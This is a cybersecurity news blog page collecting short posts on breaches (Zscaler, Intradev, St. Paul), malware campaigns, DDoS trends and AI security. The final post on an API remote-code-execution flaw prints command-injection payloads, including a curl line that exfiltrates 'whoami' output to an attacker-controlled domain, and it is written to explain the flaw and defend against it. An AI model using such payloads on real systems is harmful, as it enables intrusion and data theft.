Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label trending news. Show all posts
Zscaler
Cybersecurity Attack Data Breach Data Theft trending news Zscaler

Zscaler Confirms Data Breach Linked to Salesloft Drift Supply-Chain Attack

 

Cybersecurity firm Zscaler has revealed it suffered a data breach after attackers exploited a compromise in Salesloft Drift, an AI-driven Salesforce integration tool. The incident is part of a larger supply-chain attack in which stolen OAuth and refresh tokens were leveraged to gain unauthorized access to Salesforce environments across multiple organizations. 

Zscaler confirmed that its Salesforce instance was one of the targets, resulting in the exposure of sensitive customer details. According to the company, the information accessed by threat actors included customer names, job titles, business email addresses, phone numbers, and geographic details. In addition, data related to Zscaler product licensing, commercial agreements, and content from certain support cases was also stolen. 

While Zscaler has not disclosed the number of affected customers, it emphasized that the breach was limited to its Salesforce system and did not compromise any of its products, services, or underlying infrastructure. 

The company stated that the unauthorized data access primarily took place between August 13 and 16, 2025, with some attempts occurring earlier. Although Zscaler has not detected any misuse of the stolen data, it has urged its customers to remain cautious of phishing emails and social engineering campaigns that could exploit the compromised information. 

In response to the incident, Zscaler has taken several steps to mitigate risks, including revoking all Salesloft Drift integrations with Salesforce, rotating API tokens across its systems, and implementing stricter customer authentication protocols when handling support requests. 

An internal investigation into the full scope of the breach is ongoing. The attack has been linked to a campaign attributed to the threat group UNC6395, which was previously flagged by Google Threat Intelligence. This group is believed to have targeted Salesforce support cases to collect highly sensitive credentials such as AWS access keys, passwords, and Snowflake tokens. 

Google researchers also noted that the attackers attempted to cover their tracks by deleting query jobs, although audit logs remained available for review. The compromise of Salesloft Drift has had wide-reaching consequences across the SaaS ecosystem, impacting companies including Google, Cisco, Workday, Adidas, Qantas, Allianz Life, and LVMH subsidiaries. 

In many of these cases, attackers used vishing tactics to trick employees into authorizing malicious OAuth applications, enabling large-scale data theft later exploited in extortion schemes. 

Both Google and Salesforce have since suspended their Drift integrations while investigations continue. Security experts warn that this incident highlights the growing risks of supply-chain attacks and the urgent need for stronger oversight of third-party integrations.
Read more »
VirusTotal
cyber attack Cyber Attacks Malware Attack trending news VirusTotal

VirusTotal Unmasks SVG-Based Phishing Campaign Targeting Colombia’s Judiciary

VirusTotal has uncovered a sophisticated phishing campaign that uses SVG (Scalable Vector Graphics) files to impersonate Colombia’s judicial system, tricking victims into downloading malware. 

The discovery was made possible after the platform’s AI-powered Code Insight feature added support for analyzing SVGs, enabling it to detect malicious behavior that traditional antivirus engines missed. 

SVG files are typically used to create images from lines, shapes, and text, but cybercriminals have increasingly exploited their ability to embed HTML using the element and execute JavaScript. 

In this case, the attackers crafted SVGs that rendered convincing portals mimicking Colombia’s judiciary, complete with case numbers, security tokens, and official-looking design elements to inspire trust. When opened, the fake portal displayed a simulated download progress bar and instructed users to retrieve a password-protected ZIP archive. 

The password itself was provided directly on the spoofed page, reinforcing the illusion of legitimacy. Once extracted, the archive contained four files, including a legitimate executable from the Comodo Dragon web browser that had been renamed to appear as an official judicial document. 

Alongside it was a malicious DLL designed for sideloading, as well as two encrypted files. If the victim ran the executable, the DLL would be silently loaded to install further malware on the system, expanding the attack’s reach. The initial detection of one malicious SVG led to a broader investigation, with VirusTotal identifying 523 additional SVG files that had been previously uploaded to its platform but evaded detection by conventional security software. 

This scale highlights both the effectiveness of the attackers’ strategy and the potential blind spots in existing defences. VirusTotal emphasized that its Code Insight AI played a critical role in exposing the campaign. 

Unlike signature-based antivirus tools, the AI system generates contextual summaries of suspicious code, flagging behaviors such as JavaScript execution within SVGs. 

“This is where Code Insight helps most: giving context, saving time, and helping focus on what really matters. It’s not magic, and it won’t replace expert analysis, but it’s one more tool to cut through the noise and get to the point faster,” the company noted. 

The case underscores the growing trend of cybercriminals exploiting unconventional file formats like SVGs to bypass security checks. 

As attackers innovate, experts warn that organizations must evolve their defences with AI-driven detection to close gaps left by traditional tools.
Read more »
UK Sochool cyber incidents
British cybersecurity Cyber Attacks trending news UK Sochool cyber incidents

UK Schools Trust Hit by Knock-On Effects of Intradev Cyber Breach

 

A cyberattack on Hull-based software developer Intradev is rippling across the UK education sector, with staff at the Affinity Learning Partnership warned their personal details may have been compromised. 

The trust, which runs seven schools and employs more than 650 staff serving around 3,000 pupils, confirmed that employees were notified after the breach came to light through Single Central Record Ltd (OnlineSCR), a service provider managing recruitment and Disclosure and Barring Service (DBS) checks. 

Scope of Exposure 

While some employees are believed to have only minimal details exposed, such as surnames, others face more severe risks. Sensitive information including passport numbers, driving licence details, and National Insurance numbers may have been leaked. 

In a letter to staff, the trust said, “We have written to all staff affected, including those with less data exposure, and included a list of precautionary steps. However, there is the potential that the impact on you could be more significant and we have been made aware of some additional support options.” 

The Information Commissioner’s Office (ICO) has advised that replacing passports or driving licences may not be immediately necessary. Still, legal experts warn the nature of the stolen data could leave individuals exposed to identity fraud. 

How the Breach Happened 

Intradev, which designs bespoke software for clients, discovered a digital intrusion on August 4. One of its customers, Access Personal Checking Services (APCS), a provider of criminal record checks alerted clients soon after. 

OnlineSCR, APCS’s sister company, was also affected due to its reliance on Intradev’s systems. With OnlineSCR acting as a repository of highly sensitive school workforce data, the fallout has been significant for trusts such as Affinity Learning Partnership. 

A legal briefing from Browne Jackson LLP noted that the compromised data varied between schools but could include addresses, Qualified Teacher Status (QTS) numbers, and other identification details. 

Support Measures 

To protect staff, Affinity is offering two years of CIFAS protective registration. The service ensures additional identity verification checks are carried out if fraudsters attempt to use stolen details to open accounts or apply for credit. 

Wider Implications 

The incident underscores the growing cybersecurity vulnerabilities of UK schools, which often hold valuable personal data but operate with limited IT security budgets. It also highlights how breaches at third-party providers can have far-reaching consequences for institutions that may otherwise have strong protections in place. As Intradev continues its investigation into the compromised files and systems, education trusts across the country are being reminded of the risks inherent in outsourcing critical services to external technology partners.
Read more »
trending news
Browser Browser news news and trends Technology trending news

Beyond Google: The Rise of Privacy-Focused Search Engines

 

For years, the search engine market has been viewed as a two-player arena dominated by Google, with Microsoft’s Bing as the backup. But a quieter movement is reshaping how people explore the web: privacy-first search engines that promise not to turn users into products. 

DuckDuckGo has become the most recognisable name in this space. Its interface looks and feels much like Google, yet it refuses to track users, log searches, or build behavioural profiles. Instead, every query stands alone, delivering neutral results primarily sourced from Bing and other partners. 

While this means fewer personalised suggestions, it also ensures a cleaner, unbiased search experience. Startpage, on the other hand, positions itself as a privacy shield for Google. Acting as a middleman, it fetches Google’s results without passing on users’ IP addresses or histories. 

This gives people access to Google’s powerful index while keeping their identities hidden. For those seeking an extra layer of anonymity, Startpage even offers a built-in proxy to browse sites discreetly. 

Mojeek is one of the rare engines to build its own independent index. By crawling the web directly, it offers results shaped by its own algorithms rather than those of industry giants. While sometimes rougher around the edges, Mojeek’s independence appeals to users tired of mainstream filters and echo chambers. 

SearXNG takes yet another approach. As an open-source meta-search engine, it aggregates results from dozens of sources, from Google and Bing to Wikipedia. Crucially, it does this without sharing personal data. Users can even host their own SearXNG instance, tailoring the sources and ranking systems to their preferences, an unmatched level of control, though the experience varies by setup. Finally, Swisscows distinguishes itself with both privacy and family-friendly results. 

It blocks tracking, filters explicit content, and now runs on a subscription model of around $4.4 per month. While no longer free, its positioning makes it attractive for parents and classrooms seeking a safe and secure search option. 

Taken together, these alternatives highlight that Google is not the only gateway to the internet. From DuckDuckGo’s simplicity to SearXNG’s transparency and Mojeek’s independence, privacy-first search engines prove that it’s possible to browse the web without surrendering personal data.
Read more »
trending news
Cyber Attacks Cyber News DDOS Attack ransomware news trending news

DDoS Attacks Emerge as Geopolitical Weapons in 2025

 

The first half of 2025 witnessed more than 8 million distributed denial-of-service (DDoS) attacks worldwide, according to new figures from Netscout. The EMEA region absorbed over 3.2 million incidents, with peak strikes hitting 3.12 Tbps in speed and 1.5 Gpps in volume. Once used mainly to cause digital disruption, DDoS has now evolved into a strategic instrument of geopolitical influence. 

Adversaries are increasingly timing attacks to coincide with politically sensitive moments, striking at critical infrastructure when disruption carries maximum impact. The surge highlights how cheap and accessible DDoS-for-hire services have lowered the bar for attackers, enabling even novices to launch campaigns using AI-driven automation, multi-vector strikes, and carpet-bombing techniques. 

Botnets and Hacktivist Tactics

In March 2025 alone, attackers executed over 27,000 botnet-powered DDoS campaigns, often exploiting existing IoT vulnerabilities rather than new flaws. That month averaged 880 bot-driven incidents daily, peaking at 1,600. The assaults lasted longer too, averaging 18 minutes 24 seconds as adversaries combined multiple attack vectors to evade defenses. 

Among hacktivist actors, NoName057 remained dominant, launching TCP ACK floods, SYN floods, and HTTP/2 POST attacks against governments in Spain, Taiwan, and Ukraine. A newer group, DieNet, carried out more than 60 strikes against targets ranging from U.S. transit systems to Iraqi government sites, expanding its scope to energy, healthcare, and e-commerce. 

“As hacktivist groups leverage automation and AI-driven tools, traditional defenses are being outpaced,” warned Richard Hummel, Director of Threat Intelligence at Netscout. 

He emphasised that the rise of LLM-enabled malware tools like WormGPT and FraudGPT is deepening the risk landscape. While the takedown of NoName057(16) slowed activity temporarily, Hummel cautioned that resilience, intelligence-led strategies, and next-generation DDoS defenses are essential to stay ahead of evolving threats.
Read more »
trending news
cybersecurity news Data Breach data breach news trending news

Zscaler Confirms Exposure in Salesloft-Linked Data Breach

 

Zscaler has confirmed that it is among the latest organizations to be impacted by a major supply chain attack exploiting the Salesloft Drift application, which integrates with Salesforce. 

According to the company, attackers managed to steal OAuth tokens tied to the third-party app, giving them access to Zscaler’s Salesforce environment. The security vendor explained that the compromised data mainly consisted of business-related information rather than sensitive personal or financial records. Specifically, the exposed details included names, work email addresses, job titles, phone numbers, location data, licensing and commercial details relating to Zscaler products, as well as plain-text content from certain customer support cases. However, Zscaler emphasized that no attachments, files, or images were accessed in the incident. 

Upon detecting the unauthorized activity, the company acted quickly by revoking the Drift app’s access and rotating other API tokens as a precaution. In addition, it claimed to have put in place new safeguards and strengthened protocols to reduce the likelihood of similar breaches in the future. 

While Zscaler noted that the incident appeared limited in scope and said there is no evidence so far of any misuse of the exposed data, it urged customers to exercise extra caution. The company warned that malicious actors could exploit the stolen information for phishing campaigns or social engineering attacks, and therefore advised clients to be vigilant about unsolicited emails, calls, or requests for confidential information. 

This breach is part of a wider campaign being tracked by security researchers as UNC6395, which is said to have compromised numerous Salesforce customer environments between August 8 and August 18. The attackers reportedly exfiltrated large volumes of customer data during that period, potentially affecting hundreds of organizations. 

More recently, it has also been revealed that the same campaign targeted a limited number of Google Workspace accounts through Salesloft Drift integrations, further underlining the scope of the threat. Given the scale and operational sophistication demonstrated, some experts have speculated that a nation-state threat actor could be behind the attacks. 

Zscaler’s disclosure follows similar admissions from other companies caught in the same campaign, highlighting the continuing risks posed by supply chain compromises in cloud-based business ecosystems.
Read more »
trending tech news
Emerging tech news Technology trending news trending tech news

Business and IT Leaders Diverge on Cloud and Security Priorities

 

Enterprises are preparing to expand their cloud investments, even as many remain dissatisfied with the financial returns of recent technology deployments, according to a new report from Unisys. The study, which surveyed 1,000 C-suite and IT executives across eight global markets, highlights a widening disconnect between business leaders and technology teams on priorities for cloud, AI, and security. 

Less than half of the 300 business executives surveyed said they were pleased with the return on investment from cloud, automation, and generative AI projects. 

Still, more than 75% of respondents said their organizations intend to increase cloud spending this year. 

Unisys suggests this optimism may be undermined by outdated systems and processes. 

“Organizations are still operating on outdated foundations and processes,” said Manju Naglapur, SVP and GM for cloud, applications, and infrastructure at Unisys. 

To unlock true value, he added, companies must modernize infrastructure, align IT and business priorities, and adopt proactive cybersecurity strategies. 

Misaligned Views on AI and Security 

The report found sharp differences in how IT and business executives perceive progress. More than two in five business leaders said their companies had made strong advances in AI pilots, while fewer than a third of IT leaders agreed. Concerns over readiness to support AI workloads also surfaced, with over 40% of IT leaders saying their current infrastructure cannot handle the demands of data-intensive AI systems. Security perceptions diverged even further. 

Nearly two-thirds of business executives described rigid or outdated security frameworks as barriers to innovation and data sharing. Only about a third of IT leaders shared that view. 

The Cost of a Reactive Approach 

Despite differences, executives largely agreed that cybersecurity strategies remain too reactive. Almost 90% said their organizations are prepared to respond to attacks once they occur, but lack a robust framework to prevent them. 

The stakes are high. More than two in five companies reported that IT outages can cost as much as $500,000 per hour in unplanned downtime. “The next wave of technological disruption is already underway,” Naglapur noted, “yet many organizations are still relying on outdated foundations.”
Read more »
trending news
Digital Identity digital identity protection online threats Privacy trending news

Age Checks Online: Privacy at Risk?

 

Across the internet, the question of proving age is no longer optional, it’s becoming a requirement. Governments are tightening rules to keep children away from harmful content, and platforms are under pressure to comply. 

From social media apps and online games to streaming services and even search engines, users are now being asked to show they are over 18 before they can continue. Whether in the UK, US, EU, or Australia, more and more websites now demand proof that users are over 18. In Britain, the Online Safety Act introduced strict rules from July 25, 2025.

People must now verify their age by scanning their face, uploading an official ID, or using a credit card. The aim is to keep children away from harmful content, but experts warn these steps could create serious risks by collecting and storing large amounts of sensitive information. 

A Possible Fix

To reduce these risks, governments and companies are exploring digital ID wallets. These apps could confirm a user’s age without exposing full identity details. 

Evin McMullen, Co-Founder of Privado ID, argues that current UK rules are flawed. She warns they build “a centralised honey pot of data” that hackers could exploit. Instead, she believes age checks should be quick, safe, and forgetful." 

Different Approaches Across Regions The European Union is already running pilot projects in five countries. This forms part of the upcoming European Digital Identity Wallet, expected to roll out by 2026. Supporters say it could protect both children and privacy. 

However, concerns remain because EU lawmakers are also debating rules that might weaken encryption, the very technology that keeps data safe. In the United States, there is no single standard. Instead, several states have passed their own age-verification laws. 

This patchwork has left companies struggling to adapt. Some, such as Bluesky, have even withdrawn services from states where rules were too complex or costly to follow. 

What We Should Expect ? 

Technology exists to make age checks secure and private, but trust depends on how governments implement the laws. If privacy protections are weakened, digital ID wallets could end up being more of a surveillance tool than a safety solution. For now, the debate continues, will these wallets safeguard users or become another risk to online privacy?
Read more »
trending news
Cyber Attacks malware Malware Campaign News trending news

New Malware Campaign Using Legitimate-Looking Software Targets Users Worldwide

 

Cybersecurity experts are warning about a new wave of cyberattacks involving PXA Stealer, a sophisticated info-stealing malware now spreading rapidly across multiple countries. Originally detected by Cisco Talos researchers, PXA Stealer, written in Python was initially deployed against government agencies and educational institutions in Europe and Asia. 

However, its operators, believed to be Vietnamese-speaking cybercriminals, have shifted focus to everyday users in the U.S., South Korea, the Netherlands, Hungary, and Austria. 

According to SentinelOne, the campaign has already compromised over 4,000 unique IP addresses in 62 countries. The malware is designed to harvest browser-stored passwords, cookies, credit card information, autofill data, cryptocurrency wallet keys, and credentials from applications like Discord. Sideloading Tactics to Evade Detection The attackers are leveraging “sideloading” techniques to bypass antivirus detection. 

Victims are lured through phishing sites or tricked into downloading ZIP archives containing a legitimate, signed copy of Haihaisoft PDF Reader alongside a malicious DLL file. Once installed, the DLL ensures persistence via the Windows Registry and downloads additional payloads often hosted on platforms like Dropbox. 

When the PDF reader is launched, the malware executes a script that prompts Microsoft Edge to open a booby-trapped PDF file. Although the file triggers an error message instead of displaying content, the infection process is already complete. In another variation of the campaign, a fake Microsoft Word 2013 executable is sent as an email attachment. 

It looks like a standard document but executes a different DLL with the same malicious objective deploying PXA Stealer. Telegram Used for Data Theft Once the malware collects the stolen data, it transmits it via Telegram to the attackers, who then sell the information on underground forums and the dark web. 

Experts advise extreme caution with unsolicited emails, links, and attachments, even when they appear legitimate. Hovering over links to check their destination and avoiding downloads from unknown senders are essential safety steps. Users are also urged not to store sensitive information such as passwords or credit card details in their web browsers. Instead, dedicated password managers and secure payment methods are recommended. 

While antivirus tools remain an important layer of defence, the advanced evasion methods used in this campaign highlight the need for strong user vigilance. With PXA Stealer’s shift from targeting high-profile organisations to everyday users, security professionals warn that more variants of the malware may emerge in future attacks.
Read more »
trending news
Cyber Attacks Cyberwarfare Russian Hackers trending news

Russia’s Turla Hackers Are Using Local ISPs to Deliver Spyware to Diplomats

 

One of Russia's most sophisticated cyberespionage groups has reportedly been leveraging its country’s internet backbone to deploy spyware—right on its home turf. Turla, a hacking unit tied to Russia’s Federal Security Service (FSB), is known for complex and covert digital operations, often involving satellites and co-opting rival hackers’ infrastructure to avoid detection. 

But a recent investigation reveals a more direct strategy: manipulating Russia’s own internet service providers (ISPs) to infect targets with malware. The operation appears to have taken place in Moscow, where Turla likely used privileged access to local ISPs to intercept and tamper with web traffic. 

This allowed them to stealthily implant spyware on the systems of specific targets, such as foreign diplomats working within Russia. The tactic bypasses traditional phishing or compromised websites, instead exploiting a deep-rooted position within Russia’s internet infrastructure. 

While Turla has previously made headlines for their stealth, such as masking malware communications via satellite links or piggybacking on other hackers’ campaigns, this domestic maneuver reflects a new kind of boldness. 

Leveraging national internet controls to directly manipulate web traffic represents both a technical advantage and a dangerous precedent for global cyber operations.
Read more »
trending news
cyber attack Cyber Attacks Cybercrime. Cybercriminal. Cyberthreats National emergency trending news

St. Paul Extends State of Emergency After Devastating Cyberattack


August 5, 2025 | St. Paul, Minnesota The City of St. Paul is in the midst of one of the most disruptive cyber incidents in its history, prompting officials to extend a local state of emergency by 90 days as authorities continue efforts to recover from the attack. The breach, which began on July 25, has crippled digital infrastructure across city departments and forced officials to take the unprecedented step of disconnecting all systems from the internet. Mayor Melvin Carter, who first declared the emergency last week, now has expanded authority to fast-track recovery contracts and coordinate response efforts without standard bureaucratic delays. 

The decision to prolong the emergency was backed unanimously by the City Council on Friday, citing the need for continued access to external cybersecurity support. 

“This attack is unlike anything we’ve dealt with before—targeted, deliberate, and highly complex,” Carter said. “Our priority is restoring essential services while ensuring the safety and integrity of our systems.” 

Cyber Forensics, Shutdowns, and Gradual Recovery 

As a defensive measure, the city effectively “unplugged” itself from the internet early last week, halting online water bill payments, internal email communications, and police database lookups. Even municipal phone lines, which rely on VoIP technology, went dark temporarily. 

City officials have been slowly bringing services back online only after thorough inspection and clearance from forensic investigators, who are working alongside national cybersecurity firms, the FBI, and the Minnesota National Guard. 

Cloud-based systems and customer service lines for departments such as Parks and Recreation and the Public Library have already been restored, but many internal digital operations remain offline. 

While 911 and other emergency services were not impacted, day-to-day governance has been significantly hindered. Staff across departments have reverted to manual processes, echoing the response seen earlier this year in Abilene, Texas, when a separate cyberattack led to a complete IT overhaul. 

No Ransom Demand Yet 

Unlike many recent municipal cyberattacks, St. Paul has not received a ransom demand, leaving questions about the motive and intent behind the intrusion. Mayor Carter noted that no evidence has yet surfaced indicating that sensitive data was accessed or exfiltrated, but investigations are still underway. 

The FBI and the Minnesota National Guard’s cybersecurity unit are leading the probe into the origins and scale of the breach. Meanwhile, the city’s own Office of Technology and Communications has acknowledged that the incident quickly overwhelmed its response capacity. 

“This was not something we could handle internally,” said a city spokesperson. “It required a level of expertise and scale we simply didn’t have in-house.” 

Ramsey County, which operates several shared services with St. Paul, is also preparing to vote on its own emergency declaration this week. 

While the county’s systems have not been compromised, officials believe the measure would help streamline future coordination and potentially open avenues for financial reimbursement from state and federal agencies. “This isn’t just about technology—it’s about ensuring continuity of essential services and protecting public trust,” said City Council President Rebecca Noecker. 

A Widening Threat Landscape 

St. Paul’s experience reflects a broader and increasingly urgent trend. According to cybersecurity analysts at Comparitech, U.S. public institutions have suffered over 500 ransomware attacks since 2018, costing more than $1 billion in downtime and recovery. The number of such attacks doubled in 2024 alone, with 88 recorded incidents—up from 41 in 2022. Cybersecurity experts warn that as municipalities continue to digitize operations, they are becoming prime targets for sophisticated cybercriminals, especially those seeking to exploit gaps in funding, training, and infrastructure. 

Looking Ahead 

City officials have urged residents to remain patient as systems are carefully restored over the coming weeks. A dedicated resource hub for updates and service availability has been made available on the city’s official website, stpaul.gov. “This is a marathon, not a sprint,” Mayor Carter said. “We’re working around the clock to restore our systems safely and build stronger defenses for the future.”
Read more »
trending news
Cyber Attacks cybersecurity news Ransomware trending news

Encryption Drops While Extortion-Only Attacks Surge

 

Ransomware remains a persistent threat to organisations worldwide, but new findings suggest cybercriminals are shifting their methods. According to the latest report by Sophos, only half of ransomware attacks involved data encryption this year, a sharp decline from 70 per cent in 2023.  
The report suggests that improved cybersecurity measures may be helping organisations stop attacks before ransomware payloads are deployed. However, larger organisations with 3,001 to 5,000 employees still reported encryption in 65 per cent of attacks, possibly due to the challenges of monitoring vast IT infrastructures. 

As encryption-based tactics decrease, attackers are increasingly relying on extortion-only methods. These attacks, which involve threats to release stolen data without encrypting systems, have doubled to 6 per cent this year. Smaller businesses were disproportionately affected 13 per cent of firms with 100 to 250 employees reported facing such attacks, compared to just 3 per cent among larger enterprises.  

While Sophos highlighted software vulnerabilities as the most common entry point for attackers, this finding contrasts with other industry data. Allan Liska, a ransomware expert at Recorded Future, said leaked or stolen credentials remain the most frequently reported initial attack vector. Sophos, however, reported a drop in attacks starting with credential compromise from 29 per cent last year to 23 per cent in 2024 suggesting variations in data visibility between firms. 

The report also underscored the human cost of cyberattacks. About 41 per cent of IT and security professionals said they experienced increased stress or anxiety after handling a ransomware incident. Liska noted that while emotional tolls are predictable, they are often overlooked in incident response planning.
Read more »
trending news
Hacker T-Mobile trending news

T-Mobile’s T-Life App Raises Privacy Concerns Over Hidden Screen Recording Feature

 

T-Mobile’s flagship app, T-Life, designed to handle everything from account management to home internet settings and perks like T-Mobile Tuesdays, is now under scrutiny for a controversial feature buried deep within its settings—screen recording. The app, widely promoted as a one-stop solution for T-Mobile users, reportedly includes an option that allows it to record users’ screens during usage. According to T-Mobile, the feature is meant to help the company understand how customers interact with the app and improve the overall experience. 

However, the approach has raised serious privacy and design concerns, with critics calling it inefficient and unnecessary in an era where more refined analytics tools are standard practice across the app industry. What’s alarming is that while T-Mobile claims the feature is for user experience enhancement, screen recording as a method is rarely used by major developers for this purpose. Most prefer in-app tracking systems that anonymise and aggregate user behaviour without capturing screen content. Users and privacy advocates argue that this unusual method points less to data theft and more to a worrying level of incompetence or oversight in app development. 

 
Initially, reports of the screen recording feature surfaced among users of the Apple iPhone 16 series. However, it soon became clear that the issue isn't exclusive to iOS. Several Android users have also flagged the same feature appearing on devices including the Google Pixel 8 and 9, as well as Samsung Galaxy S21 and S22 Ultra models. The discovery has sparked widespread discussion on Reddit and other online forums, where users continue to share screenshots, speculate about the purpose of the feature, and call for greater transparency. 

As of now, T-Mobile has not released an official statement clarifying the extent or exact function of the screen recording capability, leaving users uncertain and concerned. Until the carrier addresses the issue directly, questions around user consent, data security, and development practices remain unanswered, deepening the distrust around what was supposed to be a convenient, all-in-one customer app.
Read more »
trending news
Artificial Intelligence Cerebras News Technology trending news

Cerebras Unveils World’s Fastest AI Chip, Beating Nvidia in Inference Speed

 

In a move that could redefine AI infrastructure, Cerebras Systems showcased its record-breaking Wafer Scale Engine (WSE) chip at Web Summit Vancouver, claiming it now holds the title of the world’s fastest AI inference engine. 

Roughly the size of a dinner plate, the latest WSE chip spans 8.5 inches (22 cm) per side and packs an astonishing 4 trillion transistors — a monumental leap from traditional processors like Intel’s Core i9 (33.5 billion transistors) or Apple’s M2 Max (67 billion). 

The result? A groundbreaking 2,500 tokens per second on Meta’s Llama 4 model, nearly 2.5 times faster than Nvidia’s recently announced benchmark of 1,000 tokens per second. “Inference is where speed matters the most,” said Naor Penso, Chief Information Security Officer at Cerebras. “Last week Nvidia hit 1,000 tokens per second — which is impressive — but today, we’ve surpassed that with 2,500 tokens per second.” 

Inference refers to how AI processes information to generate outputs like text, images, or decisions. Tokens, which can be words or characters, represent the basic units AI uses to interpret and respond. As AI agents take on more complex, multi-step tasks, inference speed becomes increasingly essential. “Agents need to break large tasks into dozens of sub-tasks and communicate between them quickly,” Penso explained. “Slow inference disrupts that entire flow.” 

What sets Cerebras apart isn’t just transistor count — it’s the chip’s design. Unlike Nvidia GPUs that require off-chip memory access, WSE integrates 44GB of high-speed RAM directly on-chip, ensuring ultra-fast data access and reduced latency. Independent benchmarks back Cerebras’ claims. 

Artificial Analysis, a third-party testing agency, confirmed the WSE achieved 2,522 tokens per second on Llama 4, outperforming Nvidia’s new Blackwell GPU (1,038 tokens/sec). “Cerebras is the only inference solution that currently outpaces Blackwell for Meta’s flagship model,” said Artificial Analysis CEO Micah Hill-Smith. 

While CPUs and GPUs have driven AI advancements for decades, Cerebras’ WSE represents a shift toward a new compute paradigm. “This isn’t x86 or ARM, It’s a new architecture designed to supercharge AI workloads,” said Julie Shin, Chief Marketing Officer at Cerebras.
Read more »
trending news
AI adoption AI news cyberattacks news Security Concerns trending news

AI Adoption Accelerates Despite Growing Security Concerns: Report

 

Businesses worldwide are rapidly embracing artificial intelligence (AI), yet a significant number remain deeply concerned about its security implications, according to the 2025 Thales Data Threat Report. Drawing insights from over 3,100 IT and cybersecurity professionals across 20 countries and 15 industries, the report identifies the rapid evolution of AI, particularly generative AI (GenAI) as the most pressing security threat for nearly 70% of surveyed organisations. Despite recognising AI as a major driver of innovation, many respondents expressed alarm over its risks to data integrity and trust. 

Specifically, 64% highlighted concerns over AI's lack of integrity, while 57% flagged trustworthiness as a key issue. The reliance of GenAI tools on user-provided data for tasks such as training and inference further amplifies the risk of sensitive data exposure. Even with these concerns, the pace of AI adoption continues to rise. The report found that one in three organisations is actively integrating GenAI into their operations, often before implementing sufficient security measures. Spending on GenAI tools has now become the second-highest priority for organisations, trailing only cloud security investments. 

 
“The fast-evolving GenAI landscape is pressuring enterprises to move quickly, sometimes at the cost of caution, as they race to stay ahead of the adoption curve,” said Eric Hanselman, Chief Analyst at S&P Global Market Intelligence 451 Research. 

“Many enterprises are deploying GenAI faster than they can fully understand their application architectures, compounded by the rapid spread of SaaS tools embedding GenAI capabilities, adding layers of complexity and risk.” 

In response to these emerging risks, 73% of IT professionals reported allocating budgets either new or existing towards AI-specific security solutions. While enthusiasm for GenAI continues to surge, the Thales report serves as a warning that rushing ahead without securing systems could expose organisations to serious vulnerabilities.
Read more »
trending news
Cyber Security News Trending trending news

“They're Just People—But Dangerous Ones”: Trellix's John Fokker Unpacks the Blurred Battlefield of Cybercrime at RSA 2025

 

At the RSA Conference 2025, John Fokker, head of threat intelligence at the Trellix Advanced Research Center, issued a stark reminder to the cybersecurity community that the behind of every cyberattack is a human being and the boundaries between criminals and nation-states are rapidly dissolving. Drawing from his experience as a former officer in the Dutch high-tech crime unit, Fokker urged cybersecurity professionals to stop viewing threats as faceless or purely technical. “Cybercriminals are not abstract concepts,” he said. “They’re individuals—ordinary people who happen to be doing bad things behind a keyboard.” 

His keynote speech stressed the importance of not overlooking basic vulnerabilities in the rush to guard against sophisticated attacks. “Attackers still go for the low-hanging fruit—weak passwords, missing patches, and lack of multi-factor authentication,” he noted. A central theme of his address was the convergence of criminal networks and state-backed operations. “What once were clearly separated entities—financially motivated hackers and state actors...are now intertwined,” Fokker said. “Nation-states are increasingly using proxies or outright criminals to carry out espionage and disruption campaigns.” Fokker illustrated this through a case study involving the notorious Black Basta ransomware group. 

He referenced internal communications that surfaced in an investigation, revealing the group’s leader “Oleg" formerly known as “Tramp” in the Conti gang. Oleg was reportedly arrested upon arriving in Armenia from Moscow last year, but escaped custody just days later. According to leaked chats, he claimed Russian officials orchestrated his return using a so-called “green corridor,” allegedly coordinated by a senior government figure referred to as “number one.” While Fokker clarified that these claims remain unverified, he emphasized they are a troubling sign of potential collaboration between state entities and criminal gangs. 

Still, he reminded attendees that attackers are not infallible. He recounted a failed ransomware attack by Black Basta on a U.S. healthcare organization, where the group’s encryption tool malfunctioned. “They had to fall back on threatening to leak data when the original extortion method broke down,” Fokker explained, highlighting that even seasoned attackers are prone to critical errors.
Read more »
trending news
Cyber Security News trending news

Security Researcher Uncovers Critical RCE Flaw in API Due to Incomplete Input Validation

In a recent security evaluation, a researcher discovered a severe remote code execution (RCE) vulnerability caused by improper backend input validation and misplaced reliance on frontend filters. The vulnerability centered on a username field within a target web application. 

On the surface, this field appeared to be protected by a regular expression filter—/^[a-zA-Z0-9]{1,20}$/—which was designed to accept only alphanumeric usernames up to 20 characters long. However, this filtering was enforced exclusively on the frontend via JavaScript. While this setup may prevent casual misuse through the user interface, it offered no protection once the client-side constraints were bypassed. 

The server did not replicate or enforce these restrictions, creating an opportunity for attackers to supply crafted payloads directly to the backend. Client-Side Regex: A False Sense of Security The researcher quickly identified a dangerous assumption built into the application’s architecture: that client-side validation would be sufficient to sanitize input. This approach led the backend to trust incoming data without question. 

By circumventing the web interface and manually crafting HTTP requests, the researcher was able to supply malicious input that would have been blocked by the frontend regex. This demonstrated a critical weakness in security design. The researcher noted that regular expressions should be viewed as tools to assist in user input formatting, not as security mechanisms. 

When frontend validation is treated as a safeguard rather than a convenience, it opens the door to serious vulnerabilities. Bypassing Protections via Alternate HTTP Methods The most significant discovery came when the researcher explored alternate HTTP methods. While the application interface relied on POST requests—where regex filters were enforced—the backend also accepted PUT requests at the same endpoint. These PUT requests were not subjected to any validation, creating a dangerous inconsistency. 

Using a crafted PUT request with the payload username=;id;, the researcher confirmed the ability to inject and execute arbitrary commands. The server’s response to the id command verified the successful exploitation of this oversight. Further probing revealed the potential for more advanced attacks, including out-of-band (OOB) data exfiltration. 

By submitting a payload like username=;curl http://attacker-controlled.com/$(whoami);, the researcher caused the server to initiate a connection to an external domain. This revealed the active user account running on the server, proving that the command had been executed remotely. The absence of a web application firewall (WAF) allowed this traffic to pass unnoticed, making the attack both silent and effective.  
Architectural Oversight and Security Best Practices This case highlighted a widespread architectural flaw: the fragmentation of security logic between frontend and backend layers. Developers frequently assume that if an input field is restricted on the client side, it is secure—overlooking the need to apply the same or stricter rules on the server. This disconnect is what enabled the exploit. 

The API processed data without verifying whether it adhered to expected formats, and alternative HTTP methods were insufficiently monitored or restricted. To address such risks, experts stress the importance of server-side validation as the primary line of defense. Every piece of input data should be rigorously checked against an allowlist of acceptable values before processing. 

